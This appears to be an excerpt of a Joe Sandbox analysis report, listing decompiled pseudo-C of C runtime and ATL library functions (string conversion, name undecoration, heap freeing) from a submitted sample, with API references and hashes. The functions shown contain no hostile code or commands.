                      			E0095C8D0(intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16) {
                      				intOrPtr _v8;
                      				signed int _v12;
                      				char _v20;
                      				intOrPtr _v28;
                      				intOrPtr* _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _v44;
                      				signed int _v48;
                      				intOrPtr _v52;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t90;
                      				intOrPtr _t94;
                      				void* _t133;
                      				intOrPtr _t158;
                      				intOrPtr _t180;
                      				void* _t187;
                      				void* _t189;
                      				signed int _t191;
                      				void* _t192;
                      
                      				_push(0xfffffffe);
                      				_push(0xa03b80);
                      				_push(E00959CD0);
                      				_push( *[fs:0x0]);
                      				_push(_t133);
                      				_push(_t189);
                      				_push(_t187);
                      				_t90 =  *0xa0600c; // 0x5d529087
                      				_v12 = _v12 ^ _t90;
                      				_push(_t90 ^ _t191);
                      				 *[fs:0x0] =  &_v20;
                      				_v28 = _t192 + 0xffffffe0;
                      				_v36 = 0;
                      				if(_a12[1] == 0 ||  *((char*)(_a12[1] + 8)) == 0 || _a12[2] == 0 && ( *_a12 & 0x80000000) == 0) {
                      					_t94 = 0;
                      				} else {
                      					if(( *_a12 & 0x80000000) == 0) {
                      						_v32 = _a8 + _a12[2] + 0xc;
                      					} else {
                      						_v32 = _a8;
                      					}
                      					_v8 = 0;
                      					if(( *_a12 & 0x00000080) == 0 || ( *_a16 & 0x00000010) == 0 ||  *0xb305e8 == 0) {
                      						_t144 =  *_a12 & 0x00000008;
                      						if(( *_a12 & 0x00000008) == 0) {
                      							if(( *_a16 & 0x00000001) == 0) {
                      								if(_a16[6] != 0) {
                      									if( *((intOrPtr*)(_a4 + 0x18)) == 0 || _v32 == 0) {
                      										L41:
                      										L009A0DE0(_t133, _t144, _t187, _t189);
                      									} else {
                      										_t144 = _a16;
                      										if(_a16[6] == 0) {
                      											goto L41;
                      										} else {
                      										}
                      									}
                      									if(( *_a16 & 0x00000004) == 0) {
                      										_v36 = 1;
                      									} else {
                      										_v36 = 2;
                      									}
                      								} else {
                      									if( *((intOrPtr*)(_a4 + 0x18)) == 0 || _v32 == 0) {
                      										L009A0DE0(_t133, _t144, _t187, _t189);
                      									}
                      									_v48 = _a16[5];
                      									_v52 = E0095B310(_a4,  *((intOrPtr*)(_a4 + 0x18)),  &(_a16[2]));
                      									E0095B590(_v32, _v52, _v48);
                      								}
                      							} else {
                      								_t148 = _a4;
                      								if( *((intOrPtr*)(_a4 + 0x18)) == 0 || _v32 == 0) {
                      									L009A0DE0(_t133, _t148, _t187, _t189);
                      								}
                      								E0095B590(_v32,  *((intOrPtr*)(_a4 + 0x18)), _a16[5]);
                      								if(_a16[5] == 4 &&  *_v32 != 0) {
                      									 *_v32 = E0095B310(_v32,  *_v32,  &(_a16[2]));
                      								}
                      							}
                      						} else {
                      							if( *((intOrPtr*)(_a4 + 0x18)) == 0 || _v32 == 0) {
                      								L009A0DE0(_t133, _t144, _t187, _t189);
                      							}
                      							 *_v32 =  *((intOrPtr*)(_a4 + 0x18));
                      							 *_v32 = E0095B310(_v32,  *_v32,  &(_a16[2]));
                      						}
                      					} else {
                      						_t180 =  *0xb305e8; // 0x0
                      						_v40 = _t180;
                      						_t158 = _v40;
                      						 *0x9d62b0();
                      						_v44 = _v40();
                      						if(_v44 == 0 || _v32 == 0) {
                      							L009A0DE0(_t133, _t158, _t187, _t189);
                      						}
                      						 *_v32 = _v44;
                      						 *_v32 = E0095B310( *_v32,  *_v32,  &(_a16[2]));
                      					}
                      					_v8 = 0xfffffffe;
                      					_t94 = _v36;
                      				}
                      				 *[fs:0x0] = _v20;
                      				return _t94;
                      			}


























                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: AdjustPointer
                      • String ID:
                      • API String ID: 1740715915-0
                      • Opcode ID: b092230e169c323f1eb0ab2c56031c41f4c8d129f11c9d33eeb62d134e4aad19
                      • Instruction ID: 66ff0367fd39458efca9530e99311efffdf0665d952666c57baa3f1f8c963d89
                      • Opcode Fuzzy Hash: b092230e169c323f1eb0ab2c56031c41f4c8d129f11c9d33eeb62d134e4aad19
                      • Instruction Fuzzy Hash: 25913EB4900209DFCB04CF99D895BAE77B5FB88306F248559EC15AB391C735EC85CBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E009500E0(void* __ebx, char** __ecx, void* __edi, void* __esi, short* _a4, int _a8) {
                      				char** _v8;
                      				signed int _v12;
                      				int _v16;
                      				char** _v20;
                      				char** _v24;
                      				int _v28;
                      				int _t54;
                      				char** _t55;
                      				long _t60;
                      				int _t62;
                      				int _t68;
                      				void* _t97;
                      				void* _t98;
                      
                      				_t93 = __edi;
                      				_t69 = __ebx;
                      				_v28 = 0xcccccccc;
                      				_v24 = 0xcccccccc;
                      				_v20 = 0xcccccccc;
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				if(_a4 != 0) {
                      					_v12 = E00995A70(_a4) + 1;
                      					_v16 = _v12 << 2;
                      					E00952DE0(__ebx, __edi, __esi, _v8, _v16,  &(_v8[1]), 0x80);
                      					_t98 = _t98 + 0x14;
                      					_t95 = _t98;
                      					_t54 = WideCharToMultiByte(_a8, 0, _a4, _v12,  *_v8, _v16, 0, 0);
                      					__eflags = _t98 - _t98;
                      					_t55 = E009D1520(_t54, _t98 - _t98);
                      					__eflags = _t55;
                      					if(_t55 != 0) {
                      						_v24 = 0;
                      					} else {
                      						_v24 = 1;
                      					}
                      					_t56 = _v24;
                      					_v20 = _v24;
                      					__eflags = _v20;
                      					if(_v20 != 0) {
                      						_t95 = _t98;
                      						_t60 = GetLastError();
                      						__eflags = _t98 - _t98;
                      						_t56 = E009D1520(_t60, _t98 - _t98);
                      						__eflags = _t56 - 0x7a;
                      						if(_t56 == 0x7a) {
                      							_t62 = WideCharToMultiByte(_a8, 0, _a4, _v12, 0, 0, 0, 0);
                      							__eflags = _t98 - _t98;
                      							_v16 = E009D1520(_t62, _t98 - _t98);
                      							E00952DE0(_t69, _t93, _t98, _v8, _v16,  &(_v8[1]), 0x80);
                      							_t98 = _t98 + 0x10;
                      							_t95 = _t98;
                      							_t68 = WideCharToMultiByte(_a8, 0, _a4, _v12,  *_v8, _v16, 0, 0);
                      							__eflags = _t98 - _t98;
                      							_t56 = E009D1520(_t68, _t98 - _t98);
                      							__eflags = _t56;
                      							if(_t56 != 0) {
                      								_v28 = 0;
                      							} else {
                      								_v28 = 1;
                      							}
                      							_v20 = _v28;
                      						}
                      					}
                      					__eflags = _v20;
                      					if(__eflags != 0) {
                      						__eflags =  &(_v8[1]);
                      						E00952B10(_t93,  *_v8,  &(_v8[1]), 0x80);
                      						_t98 = _t98 + 0xc;
                      						_t56 = E00942580(_t69,  *_v8, _t93, _t95);
                      					}
                      				} else {
                      					_t56 = _v8;
                      					 *_v8 = 0;
                      				}
                      				return E009D1520(_t56, _t97 - _t98 + 0x18);
                      			}

















                      APIs
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?,?,?,?,00947521,?,5D529087), ref: 0095016A
                      • GetLastError.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,00947521), ref: 0095019D
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 009501CB
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,00000000,00000000), ref: 00950215
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$ErrorLast
                      • String ID:
                      • API String ID: 1717984340-0
                      • Opcode ID: 15fcd9efc92cb95e3dfb015b50c2c517b29b142c5a89da95cb890a7c6b1c5e38
                      • Instruction ID: 2d4e4406eaa9674519fd3de6c588e8098b8aaa1d3dff30cb291373180e3f65e0
                      • Opcode Fuzzy Hash: 15fcd9efc92cb95e3dfb015b50c2c517b29b142c5a89da95cb890a7c6b1c5e38
                      • Instruction Fuzzy Hash: 8E512DB5E00208BFDB10DF99D886BAEB7B4AF88301F208159F915AB380D7759E44CBD1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E009AD130(signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                      				signed int _v8;
                      				signed int _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				void* _t39;
                      				void* _t40;
                      				signed short* _t79;
                      
                      				if(_a4 != 0) {
                      					_t79 = _a4;
                      					__eflags =  *_t79 & 0x0000ffff;
                      					if(( *_t79 & 0x0000ffff) != 0) {
                      						_t65 = _a12;
                      						_v8 = E009AE5E0(_a12, _a16, _a4, 0, 0);
                      						__eflags = _v8;
                      						if(_v8 != 0) {
                      							__eflags = _v8 - E009AE9C0(_a8);
                      							if(__eflags <= 0) {
                      								L12:
                      								_t39 = E009AE9C0(_a8);
                      								_t40 = E009AEA70(_a8);
                      								_t70 = _a12;
                      								_v20 = E009AE5E0(_a12, _a16, _a4, _t40, _t39);
                      								__eflags = _v20;
                      								if(_v20 != 0) {
                      									L009AEF70(_a8, _v20 - 1);
                      									__eflags = 0;
                      									return 0;
                      								}
                      								L00992F10(_t70, GetLastError());
                      								return  *((intOrPtr*)(L00992F70(_t70)));
                      							}
                      							_v16 = E009AE7A0(_a8, __eflags, _v8);
                      							__eflags = _v16;
                      							if(_v16 == 0) {
                      								goto L12;
                      							}
                      							return _v16;
                      						}
                      						L00992F10(_t65, GetLastError());
                      						return  *((intOrPtr*)(L00992F70(_t65)));
                      					}
                      					__eflags = E009AE9C0(_a8);
                      					if(__eflags != 0) {
                      						L6:
                      						 *((char*)(E009AEA70(_a8))) = 0;
                      						L009AEF70(_a8, 0);
                      						return 0;
                      					}
                      					_v12 = E009AE7A0(_a8, __eflags, 1);
                      					__eflags = _v12;
                      					if(_v12 == 0) {
                      						goto L6;
                      					}
                      					return _v12;
                      				}
                      				E009AEEF0(_a8);
                      				return 0;
                      			}











                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 78adacbe09f17cf780341c62d7531c978b39ce6b804f061f196255aab0556df6
                      • Instruction ID: 60c88cedff788d57df167de9f10d5fc84bc586671ea517687992cc35b6c0e531
                      • Opcode Fuzzy Hash: 78adacbe09f17cf780341c62d7531c978b39ce6b804f061f196255aab0556df6
                      • Instruction Fuzzy Hash: 08310370A05108EFDB04EFA4D855BAE77B9AFC6304F108968F8269B691DB34DD40DBD0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E009AADB0(signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				void* _t39;
                      				void* _t40;
                      
                      				if(_a4 != 0) {
                      					if(( *_a4 & 0x0000ffff) != 0) {
                      						_t65 = _a12;
                      						_v8 = E009AAFA0(_a12, _a16, _a4, 0, 0);
                      						if(_v8 != 0) {
                      							if(_v8 <= E009AB130(_a8)) {
                      								L12:
                      								_t39 = E009AB130(_a8);
                      								_t40 = E009AB150(_a8);
                      								_t70 = _a12;
                      								_v20 = E009AAFA0(_a12, _a16, _a4, _t40, _t39);
                      								if(_v20 != 0) {
                      									E009AB1D0(_a8, _v20 - 1);
                      									return 0;
                      								}
                      								L00992F10(_t70, GetLastError());
                      								return  *((intOrPtr*)(L00992F70(_t70)));
                      							}
                      							_v16 = E009AB0A0(_a8, _v8);
                      							if(_v16 == 0) {
                      								goto L12;
                      							}
                      							return _v16;
                      						}
                      						L00992F10(_t65, GetLastError());
                      						return  *((intOrPtr*)(L00992F70(_t65)));
                      					}
                      					if(E009AB130(_a8) != 0) {
                      						L6:
                      						 *((char*)(E009AB150(_a8))) = 0;
                      						E009AB1D0(_a8, 0);
                      						return 0;
                      					}
                      					_v12 = E009AB0A0(_a8, 1);
                      					if(_v12 == 0) {
                      						goto L6;
                      					}
                      					return _v12;
                      				}
                      				E009AB190(_a8);
                      				return 0;
                      			}










                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7f47387c2f6b39a5e5e281a56aa7987e959b1eabe3c99d711ca7ba1267dd5a69
                      • Instruction ID: 3242ce1f25d4d892e675ac913d0f203833615525011846fbab62e22260d52b3c
                      • Opcode Fuzzy Hash: 7f47387c2f6b39a5e5e281a56aa7987e959b1eabe3c99d711ca7ba1267dd5a69
                      • Instruction Fuzzy Hash: D3311071A0410CEFDB04EFB4D855BAE77B9AF85344F208568F8199B292DB34AD40DBD1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 55%
                      			E00954C30(void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16, intOrPtr _a20) {
                      				char _v40;
                      				char _v52;
                      				intOrPtr _v60;
                      				void* _v68;
                      				char _v72;
                      				void* _t36;
                      				intOrPtr* _t59;
                      				void* _t64;
                      				void* _t65;
                      				void* _t71;
                      				void* _t72;
                      				void* _t73;
                      
                      				_t64 =  &_v72;
                      				memset(_t64, 0xcccccccc, 0x11 << 2);
                      				_t73 = _t72 + 0xc;
                      				_t65 = _t64 + 0x11;
                      				if(_a20 != 0) {
                      					__imp__#8(_a20);
                      					E009D1520(_a20, _t73 - _t73);
                      				}
                      				E0095AF80(_t65,  &_v40, 0, 0x20);
                      				_t74 = _t73 + 0xc;
                      				_v52 = 0xffffffff;
                      				_t59 =  *((intOrPtr*)( *_a4 + 0x18));
                      				_v60 = E009D1520( *_t59(_a4, _a8, 0x9d6390, 0x400, _a12 & 0x0000ffff, _a16, _a20,  &_v40,  &_v52), _t73 + 0xc - _t73 + 0xc);
                      				if(_v60 < 0) {
                      					_v68 = 0;
                      					if(E00957100( &_v40,  &_v40,  &_v68) >= 0) {
                      						__imp__#201(0, _v68);
                      						E009D1520(_t39, _t74 - _t74);
                      						_t59 = _v68;
                      						E009D1520( *((intOrPtr*)( *((intOrPtr*)( *_v68 + 8))))(_t59), _t74 - _t74);
                      					}
                      				}
                      				_push(_t59);
                      				_push(_v60);
                      				E009D14C0(_t71, 0x954d24);
                      				_pop(_t36);
                      				return E009D1520(_t36, _t71 - _t74 + 0x44);
                      			}
















                      APIs
                      • VariantInit.OLEAUT32(00000000), ref: 00954C53
                      • _com_handle_excepinfo.COMSUPP ref: 00954CC9
                      • SetErrorInfo.OLEAUT32(00000000,00000000,?,00000000), ref: 00954CDA
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00954D0B
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckErrorInfoInitStackVariantVars@8_com_handle_excepinfo
                      • String ID:
                      • API String ID: 2090126287-0
                      • Opcode ID: b362a8010e04f7e6b1ba5094637bc1266de3b880133a95f5e2b0c7730ca4db7e
                      • Instruction ID: 3e7b8898482418d3b096c353ea00944f139f9a00f2eb8e1b5bed366a3d870f6b
                      • Opcode Fuzzy Hash: b362a8010e04f7e6b1ba5094637bc1266de3b880133a95f5e2b0c7730ca4db7e
                      • Instruction Fuzzy Hash: 52313C72904218ABC710EF99EC82BDEB3B9ABC8314F108219F905A7291D634AD8587D1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00966980(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                      				char _v12;
                      				intOrPtr _v16;
                      				char _v20;
                      				char _v28;
                      				char _v36;
                      				char* _t18;
                      				void* _t22;
                      				char* _t25;
                      				intOrPtr _t46;
                      				intOrPtr _t51;
                      				intOrPtr _t52;
                      				char* _t53;
                      
                      				_t18 =  *0xb30640; // 0x0
                      				if( *_t18 != 0) {
                      					E0095F270( &_v12, 0x26);
                      					E0095FD40( &_v12, E009675A0(__ebx, __edi, __esi, __eflags,  &_v28));
                      					_t22 = E0096A6C0( &_v12);
                      					__eflags = _t22;
                      					if(_t22 == 0) {
                      						L6:
                      						E0095F350(_a4, 2);
                      						return _a4;
                      					}
                      					_t25 =  *0xb30640; // 0x0
                      					__eflags =  *_t25 - 0x40;
                      					if( *_t25 != 0x40) {
                      						goto L6;
                      					}
                      					_t51 =  *0xb30640; // 0x0
                      					_t52 = _t51 + 1;
                      					 *0xb30640 = _t52;
                      					_v20 = E00960060("::", 2);
                      					_v16 = _t52;
                      					E0095FCA0( &_v12,  &_v20);
                      					E0095FD40( &_v12, E0096A1E0(__ebx, __edi, __esi,  &_v36, 0, 0));
                      					_t53 =  *0xb30640; // 0x0
                      					__eflags =  *_t53 - 0x40;
                      					if( *_t53 != 0x40) {
                      						goto L6;
                      					}
                      					_t46 =  *0xb30640; // 0x0
                      					 *0xb30640 = _t46 + 1;
                      					E0095F240(_a4,  &_v12);
                      					return _a4;
                      				}
                      				E0095F350(_a4, 1);
                      				return _a4;
                      			}
















                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00966997
                        • Part of subcall function 0095F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 0095F3AE
                      • DName::isValid.LIBCMTD ref: 009669C6
                      • Mailbox.LIBCMTD ref: 00966A4D
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Name$MailboxName::Name::isNode::makeStatusValid
                      • String ID:
                      • API String ID: 3478594962-0
                      • Opcode ID: feb29abf6c4ca4ff065c2c045c4089d8fcb2775e9cff7f30b14f72a22591d580
                      • Instruction ID: e6bf745e77c866f492b1832aa54095ddd70dda4327db998dfa3962d062415255
                      • Opcode Fuzzy Hash: feb29abf6c4ca4ff065c2c045c4089d8fcb2775e9cff7f30b14f72a22591d580
                      • Instruction Fuzzy Hash: 2C2156B1950104ABDB04EF50DCA2FAE7B74BF80305F148169F81A6B191DF71AA54CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00965B40(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                      				char _v12;
                      				char _v20;
                      				char* _t12;
                      				intOrPtr _t20;
                      				char* _t30;
                      
                      				_t12 =  *0xb30640; // 0x0
                      				if( *_t12 != 0) {
                      					E009686C0(__ebx, __edi, __esi,  &_v12);
                      					E0095FDE0( &_v12, 0x2e);
                      					E0095FD40( &_v12, E0096A1E0(__ebx, __edi, __esi,  &_v20, 0, 0));
                      					_t30 =  *0xb30640; // 0x0
                      					if( *_t30 != 0x40) {
                      						E0095F350(_a4, 2);
                      						return _a4;
                      					}
                      					_t20 =  *0xb30640; // 0x0
                      					 *0xb30640 = _t20 + 1;
                      					E0095F240(_a4,  &_v12);
                      					return _a4;
                      				}
                      				E0095F350(_a4, 1);
                      				return _a4;
                      			}









                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00965B57
                        • Part of subcall function 0095F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 0095F3AE
                      • DName::operator+=.LIBCMTD ref: 00965B72
                      • Mailbox.LIBCMTD ref: 00965BB2
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Name$MailboxName::Name::operator+=Node::makeStatus
                      • String ID:
                      • API String ID: 481169399-0
                      • Opcode ID: e91d12c2ddb1ce76236e4ecb723ad031aff592c5f13fa0826ea077ae27d59d3d
                      • Instruction ID: 362e3b749db9e06f005e56495a57533ffb5f287ab624ffec3bcfb92c0aac0756
                      • Opcode Fuzzy Hash: e91d12c2ddb1ce76236e4ecb723ad031aff592c5f13fa0826ea077ae27d59d3d
                      • Instruction Fuzzy Hash: B501967064010467EB04EF60DCA3FAE3774AF80345F040068F8095F195DF71BA44CB81
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 89%
                      			E00946860(intOrPtr __ecx, void* __esi, void* _a4) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				void* _t19;
                      				void* _t20;
                      
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				if(_a4 != 0) {
                      					_v12 = E009D1520(HeapFree( *(_v8 + 4), 0, _a4), _t20 - _t20);
                      					_t24 = _v12;
                      					if(_v12 == 0) {
                      						_t10 = L00994930(_t24, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlmem.h", 0x9a, 0, "%ls", L"bSuccess");
                      						_t20 = _t20 + 0x18;
                      						if(_t10 == 1) {
                      							asm("int3");
                      						}
                      					}
                      				}
                      				return E009D1520(_t10, _t19 - _t20 + 8);
                      			}








                      APIs
                      • HeapFree.KERNEL32(?,00000000,00000000), ref: 0094688D
                      Strings
                      • %ls, xrefs: 009468A8
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlmem.h, xrefs: 009468B4
                      • bSuccess, xrefs: 009468A3
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: FreeHeap
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlmem.h$bSuccess
                      • API String ID: 3298025750-1732559737
                      • Opcode ID: d72918cef35fb6cbf2fea514ece93f5bb5c9a26ff5841f6e8502799175850268
                      • Instruction ID: 830bec4b331b9bdbbb20e8f1290d37d7c9d0bc4aed80a9d02c0261b668f0943e
                      • Opcode Fuzzy Hash: d72918cef35fb6cbf2fea514ece93f5bb5c9a26ff5841f6e8502799175850268
                      • Instruction Fuzzy Hash: 99F0C872E80318BBCB10AF9CAC47FAD77389B41705F108199F90426381D6B19A9487D6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 59%
                      			E009538E0(void* __esi, CHAR* _a4) {
                      				void* _t5;
                      				CHAR* _t7;
                      				char* _t8;
                      				void* _t16;
                      				void* _t17;
                      
                      				do {
                      					_t18 = _a4;
                      					if(_a4 == 0) {
                      						_t5 = L00994930(_t18, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlcore.h", 0x226, 0, "%ls", L"p != 0");
                      						_t17 = _t17 + 0x18;
                      						if(_t5 == 1) {
                      							asm("int3");
                      						}
                      					}
                      				} while (0 != 0);
                      				if( *_a4 != 0) {
                      					_t7 = CharNextA(_a4);
                      					__eflags = _t17 - _t17;
                      					_t8 = E009D1520(_t7, __eflags);
                      				} else {
                      					_t8 =  &(_a4[1]);
                      				}
                      				return E009D1520(_t8, _t16 - _t17);
                      			}









                      Strings
                      • %ls, xrefs: 009538EF
                      • p != 0, xrefs: 009538EA
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcore.h, xrefs: 009538FB
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcore.h$p != 0
                      • API String ID: 0-1831341932
                      • Opcode ID: 1f0c83ead95aa0de165a16f2959a6ee77eb120288692e248a148bae0eb8ec786
                      • Instruction ID: a65fd56f0e84f6a93ae775cb436806c5d01b61f96d89bec85893dff9a3ad151f
                      • Opcode Fuzzy Hash: 1f0c83ead95aa0de165a16f2959a6ee77eb120288692e248a148bae0eb8ec786
                      • Instruction Fuzzy Hash: 5DF02E72644318B7DF10EB55DC43B7D374C5B417C6F008511FE0959281D5A5DF8047C5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E009CD00B(void* _a4, long _a8, DWORD* _a12) {
                      				void* _t13;
                      
